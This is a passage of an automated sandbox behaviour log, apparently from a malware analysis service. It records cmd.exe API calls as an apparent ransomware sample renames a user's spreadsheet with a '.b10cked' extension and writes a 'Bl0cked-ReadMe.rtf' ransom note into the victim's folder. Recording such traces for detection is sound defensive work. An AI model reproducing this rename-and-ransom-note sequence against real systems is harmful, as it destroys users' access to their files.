(_String1="move", _String2="RMDIR") returned -5 [0133.249] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0133.249] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0133.249] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0133.249] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0133.249] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0133.249] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0133.249] _wcsicmp (_String1="move", _String2="VER") returned -9 [0133.249] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0133.249] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0133.249] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0133.249] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0133.249] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0133.249] _wcsicmp (_String1="move", _String2="START") returned -6 [0133.249] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0133.249] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0133.249] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0133.251] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0133.251] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0133.251] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf4ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf4a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf4a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0133.252] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0133.253] _wcsicmp (_String1="LIM3LQ~1.XLS", _String2=".") returned 62 [0133.253] _wcsicmp (_String1="LIM3LQ~1.XLS", _String2="..") returned 62 [0133.253] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lq~1.xls")) returned 0x20 [0133.253] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e1eb0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.253] SetErrorMode (uMode=0x0) returned 0x0 [0133.253] SetErrorMode (uMode=0x1) returned 0x0 [0133.253] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", nBufferLength=0x104, lpBuffer=0x1cee34, lpFilePart=0x1cee1c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", lpFilePart=0x1cee1c*="LIM3LQ~1.XLS") returned 0x34 [0133.253] SetErrorMode (uMode=0x0) returned 0x1 [0133.253] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x10 [0133.253] _wcsicmp (_String1="LIM3LQ~1.XLS", _String2=".") returned 62 [0133.253] _wcsicmp (_String1="LIM3LQ~1.XLS", _String2="..") returned 62 [0133.253] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lq~1.xls")) returned 0x20 [0133.253] SetErrorMode (uMode=0x0) returned 0x0 [0133.253] SetErrorMode (uMode=0x1) returned 0x0 [0133.254] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", nBufferLength=0x104, lpBuffer=0x1cf2b0, lpFilePart=0x1cf048 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", lpFilePart=0x1cf048*="LIM3LQ~1.XLS") returned 0x34 [0133.254] SetErrorMode (uMode=0x0) returned 0x1 [0133.254] SetErrorMode (uMode=0x0) returned 0x0 [0133.254] SetErrorMode (uMode=0x1) returned 0x0 [0133.254] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked", nBufferLength=0x104, lpBuffer=0x1cf4b8, lpFilePart=0x1cf048 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked", lpFilePart=0x1cf048*="lim3Lqu-K6HO.xls.b10cked") returned 0x40 [0133.254] SetErrorMode (uMode=0x0) returned 0x1 [0133.254] SetLastError (dwErrCode=0x0) [0133.254] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lqu-k6ho.xls.b10cked")) returned 0xffffffff [0133.254] GetLastError () returned 0x2 [0133.254] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x1ce9c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce9c4) returned 0x2d0f10 [0133.254] FindNextFileW (in: hFindFile=0x2d0f10, lpFindFileData=0x1ce9c4 | out: lpFindFileData=0x1ce9c4) returned 0 [0133.255] GetLastError () returned 0x12 [0133.255] FindClose (in: hFindFile=0x2d0f10 | out: hFindFile=0x2d0f10) returned 1 [0133.255] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x2e1c50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1c50) returned 0x2d0f10 [0133.256] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked", nBufferLength=0x104, lpBuffer=0x1cec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked", lpFilePart=0x0) returned 0x40 [0133.256] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls", nBufferLength=0x104, lpBuffer=0x1cec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls", lpFilePart=0x0) returned 0x38 [0133.256] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lqu-k6ho.xls")) returned 0x20 [0133.256] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lqu-k6ho.xls"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lqu-k6ho.xls.b10cked"), dwFlags=0x3) returned 1 [0133.256] FindClose (in: hFindFile=0x2d0f10 | out: hFindFile=0x2d0f10) returned 1 [0133.256] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1cec10 | out: _Buffer=" 1") returned 9 [0133.257] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.257] GetFileType (hFile=0x7) returned 0x2 [0133.451] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0133.452] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ceb9c | out: lpMode=0x1ceb9c) returned 1 [0133.452] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.452] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cebd0 | out: lpConsoleScreenBufferInfo=0x1cebd0) returned 1 [0133.452] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0133.452] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1cec10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0133.452] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1cebf4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cebf4*=0x1a) returned 1 [0133.452] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.452] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.453] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.453] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.453] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.453] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.453] SetConsoleInputExeNameW () returned 0x1 [0133.453] GetConsoleOutputCP () returned 0x1b5 [0133.453] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.453] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.453] exit (_Code=0) Process: id = "123" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xa3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12817 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12818 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12819 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12820 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 12821 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12822 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12823 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12824 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12825 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 12826 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12861 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12862 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12863 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 12864 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12865 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 12866 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12867 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12868 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12869 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12870 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12871 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12872 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12873 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12874 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12875 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 12876 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12877 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12878 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 12879 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 12880 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12881 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 12882 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 12883 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 12884 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 179 os_tid = 0xa40 [0133.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afaf4 | out: lpSystemTimeAsFileTime=0x1afaf4*(dwLowDateTime=0x895eb8e0, dwHighDateTime=0x1d440a9)) [0133.279] GetCurrentProcessId () returned 0xa3c [0133.279] GetCurrentThreadId () returned 0xa40 [0133.279] GetTickCount () returned 0x2a581 [0133.279] QueryPerformanceCounter (in: lpPerformanceCount=0x1afaec | out: lpPerformanceCount=0x1afaec*=19006785388) returned 1 [0133.279] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0133.279] __set_app_type (_Type=0x1) [0133.279] __p__fmode () returned 0x76b331f4 [0133.279] __p__commode () returned 0x76b331fc [0133.279] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0133.280] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0133.280] GetCurrentThreadId () returned 0xa40 [0133.280] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa40) returned 0x38 [0133.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.280] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0133.280] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.280] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.280] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa84 | out: phkResult=0x1afa84*=0x0) returned 0x2 [0133.280] VirtualQuery (in: lpAddress=0x1afabb, lpBuffer=0x1afa54, dwLength=0x1c | out: lpBuffer=0x1afa54*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.280] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa54, dwLength=0x1c | out: lpBuffer=0x1afa54*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.280] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa54, dwLength=0x1c | out: lpBuffer=0x1afa54*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.280] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa54, dwLength=0x1c | out: lpBuffer=0x1afa54*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.280] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa54, dwLength=0x1c | out: lpBuffer=0x1afa54*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0133.280] GetConsoleOutputCP () returned 0x1b5 [0133.281] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.281] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0133.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0133.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.281] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.281] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.281] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0133.281] GetEnvironmentStringsW () returned 0x3a0198* [0133.282] FreeEnvironmentStringsW (penv=0x3a0198) returned 1 [0133.282] GetEnvironmentStringsW () returned 0x3a0198* [0133.282] FreeEnvironmentStringsW (penv=0x3a0198) returned 1 [0133.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9f4 | out: phkResult=0x1ae9f4*=0x40) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0xc0, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x1, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0x1, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x0, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x40, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x40, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0x40, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegCloseKey (hKey=0x40) returned 0x0 [0133.282] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9f4 | out: phkResult=0x1ae9f4*=0x40) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0x40, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x1, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0x1, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, 